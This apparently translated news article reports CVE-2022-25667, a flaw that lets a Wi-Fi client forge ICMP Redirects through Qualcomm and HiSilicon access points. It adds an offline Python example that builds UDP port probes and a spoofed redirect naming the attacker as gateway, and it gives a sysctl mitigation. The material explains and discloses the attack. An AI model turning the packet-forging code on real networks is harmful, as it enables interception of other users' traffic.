A vulnerability affecting Qualcomm and HiSilicon routers has been detected

If exploited, the flaw lets an attacker who is already on the same Wi-Fi network route other clients' traffic through their own machine and read or tamper with anything in it that is not protected by end-to-end encryption.

It was recently reported that a group of researchers from Tsinghua University (China) and George Mason University (USA) disclosed a vulnerability (CVE-2022-25667) in access points that allows traffic interception (MITM) in wireless networks protected by the WPA, WPA2 and WPA3 protocols.

By sending forged ICMP Redirect messages (ICMP type 5), an attacker can reroute the victim's traffic inside the wireless network through their own system, which lets them intercept and tamper with unencrypted sessions (for example, requests to non-HTTPS sites).

The vulnerability stems from the network processors (NPUs, Network Processing Units) that handle low-level packet processing in the access points: they do not properly filter ICMP messages whose source address has been spoofed.

In particular, the NPUs forward forged ICMP Redirect messages without checking them for spoofing, and those messages can be used to alter entries in the routing table on the victim's side.

The key idea is to misuse the cross-layer interaction between the WPA protocols and ICMP, completely evading the link-layer security mechanisms that WPA enforces.

The attack boils down to sending, on behalf of the access point, an ICMP Redirect message whose headers carry forged data. Because of the vulnerability, the access point forwards the message and the victim's network stack processes it as if the access point itself had sent it.

In the researchers' words: "We identified two requirements for successfully launching our attack. First, when the attacker spoofs the legitimate AP to craft an ICMP redirect message, the AP cannot recognize and filter those spoofed ICMP redirects."

The researchers also devised a way to get past the checks a client applies to incoming ICMP Redirect messages before it will alter its routing table. To get around this filtering, the attacker first identifies a UDP port that is open on the victim.

"Second, we developed a new method to ensure that the spoofed ICMP redirect message can evade the victim's legitimacy check and then poison their routing table. We conducted an extensive measurement study on 122 real-world Wi-Fi networks, covering all of the prevailing Wi-Fi security modes."

Although the attacker is on the same wireless network, they can capture the victim's frames but not decrypt them, because the victim's traffic to the access point is protected by a session key the attacker does not have. By sending probe packets to the victim, however, the attacker can find an open UDP port: probes to closed ports draw ICMP "Destination Unreachable" (port unreachable) replies, while an open port stays silent. The attacker then crafts an ICMP Redirect message that embeds a forged UDP header naming that open port.
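The two steps just described, the UDP port discovery and the forged ICMP Redirect that embeds the discovered port, together with the two checks the article touches on (the victim's legitimacy check and the source-address filtering the NPUs are said to lack), as an added example written for this page; it is not the researchers' code. Everything is standard-library Python and stays offline: the addresses, the victim's open port and the "network" that answers the probes are constructed here, and the victim-side check is a simplified model of what a host's stack does, not kernel code.

```python
import socket
import struct

# Constructed addresses for this example (not taken from the paper).
AP_IP, VICTIM_IP, ATTACKER_IP, REMOTE_IP = "192.168.1.1", "192.168.1.20", "192.168.1.77", "8.8.8.8"
PROTO_ICMP, PROTO_UDP = 1, 17
ICMP_DEST_UNREACH, CODE_PORT_UNREACH = 3, 3     # "Destination Unreachable" / "Port Unreachable"
ICMP_REDIRECT, CODE_REDIRECT_HOST = 5, 1        # ICMP Redirect / "Redirect for Host"


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum; yields 0 over a header whose checksum field is correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with its checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def icmp_message(itype: int, code: int, rest: bytes, body: bytes) -> bytes:
    """ICMP header (type, code, checksum, 4-byte 'rest of header') followed by body."""
    msg = struct.pack("!BBH", itype, code, 0) + rest + body
    return msg[:2] + struct.pack("!H", checksum(msg)) + msg[4:]


def parse_icmp(pkt: bytes):
    """Return (src, dst, type, code, rest, body) of an IPv4/ICMP packet, or None."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != PROTO_ICMP or checksum(pkt[ihl:]) != 0:
        return None
    icmp = pkt[ihl:]
    return (socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]),
            icmp[0], icmp[1], icmp[4:8], icmp[8:])


def udp_probe(dst_port: int) -> bytes:
    """Step 1: attacker's empty UDP datagram to the victim, testing one port."""
    udp = struct.pack("!HHHH", 40000, dst_port, 8, 0)
    return ipv4_header(ATTACKER_IP, VICTIM_IP, PROTO_UDP, len(udp)) + udp


def port_unreachable(probe: bytes) -> bytes:
    """A host's reply to a probe at a closed UDP port: ICMP type 3 code 3 quoting
    the probe's IP header plus its first 8 bytes."""
    ihl = (probe[0] & 0x0F) * 4
    src, dst = socket.inet_ntoa(probe[12:16]), socket.inet_ntoa(probe[16:20])
    icmp = icmp_message(ICMP_DEST_UNREACH, CODE_PORT_UNREACH, b"\x00" * 4, probe[:ihl + 8])
    return ipv4_header(dst, src, PROTO_ICMP, len(icmp)) + icmp


def udp_port_state(response) -> str:
    """Classify a probe result: a Port Unreachable reply means closed; silence means open."""
    if response is None:
        return "open"
    parsed = parse_icmp(response)
    if parsed and parsed[2] == ICMP_DEST_UNREACH and parsed[3] == CODE_PORT_UNREACH:
        return "closed"
    return "unknown"


def forge_redirect(victim_port: int, remote_port: int = 53) -> bytes:
    """Step 2: ICMP Host Redirect with source = AP and new gateway = attacker. RFC 792 makes
    it quote the IP header + 8 bytes of the datagram that 'triggered' it; a UDP header
    naming the victim's open port makes that quote look like one of the victim's own flows."""
    inner_udp = struct.pack("!HHHH", victim_port, remote_port, 8, 0)
    inner = ipv4_header(VICTIM_IP, REMOTE_IP, PROTO_UDP, len(inner_udp)) + inner_udp
    icmp = icmp_message(ICMP_REDIRECT, CODE_REDIRECT_HOST, socket.inet_aton(ATTACKER_IP), inner)
    return ipv4_header(AP_IP, VICTIM_IP, PROTO_ICMP, len(icmp)) + icmp


def victim_accepts(pkt: bytes, current_gateway: str, open_sockets) -> bool:
    """Simplified model (ours, not kernel code) of the host-side legitimacy check: the redirect
    must come from the gateway in use, and the quoted datagram must match a socket this host
    really has open (protocol, local port) and carry this host's address as source."""
    parsed = parse_icmp(pkt)
    if not parsed or parsed[2] != ICMP_REDIRECT or parsed[0] != current_gateway:
        return False
    inner = parsed[5]
    ihl = (inner[0] & 0x0F) * 4
    local_port = struct.unpack("!H", inner[ihl:ihl + 2])[0]
    return socket.inet_ntoa(inner[12:16]) == parsed[1] and (inner[9], local_port) in open_sockets


def ap_forwards(pkt: bytes, station_ip: str) -> bool:
    """AP-side anti-spoofing the NPUs are reported to skip: a packet received from an associated
    station (known from its 802.11 source address) must carry that station's own IP as source.
    The forged redirect claims to come from the AP itself, so it fails this check."""
    return socket.inet_ntoa(pkt[12:16]) == station_ip


if __name__ == "__main__":
    open_sockets = {(PROTO_UDP, 5353)}                   # constructed victim: only UDP 5353 open

    def victim_reply(probe):                             # simulated network, no real sockets
        dport = struct.unpack("!H", probe[22:24])[0]
        return None if (PROTO_UDP, dport) in open_sockets else port_unreachable(probe)

    print({p: udp_port_state(victim_reply(udp_probe(p))) for p in (4000, 5353)})  # {4000: 'closed', 5353: 'open'}
    redirect = forge_redirect(5353)
    print("AP with source check forwards it:", ap_forwards(redirect, ATTACKER_IP))  # False
    print("victim accepts it:", victim_accepts(redirect, AP_IP, open_sockets))         # True
```

Run it directly to see the probe classification, that an access point which ties a station's source IP to its association would drop the forged redirect, and that the victim model accepts the redirect only once the quoted UDP header names a port that is genuinely open. On Linux clients, processing of ICMP Redirects can be disabled altogether through the net.ipv4.conf.*.accept_redirects sysctls.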

The problem has been confirmed on access points built around HiSilicon and Qualcomm chips. A study of 55 access point models from 10 well-known manufacturers (Cisco, NetGear, Xiaomi, Mercury, 360, Huawei, TP-Link, H3C, Tenda, Ruijie) showed that all of them are vulnerable and fail to block forged ICMP packets. In addition, an analysis of 122 deployed wireless networks found 109 of them (89%) open to the attack.

To exploit the vulnerability, the attacker must be able to join the Wi-Fi network legitimately, that is, they must know its access credentials; the vulnerability then lets them defeat the mechanisms the WPA, WPA2 and WPA3 protocols use to isolate one client's traffic from the others on the same network.

Unlike traditional MITM attacks on wireless networks, the ICMP spoofing technique spares the attacker from deploying a rogue access point: the legitimate access points serving the network are what deliver the specially crafted ICMP messages to the victim.

Finally, if you are interested in learning more, you can consult the details at the following link

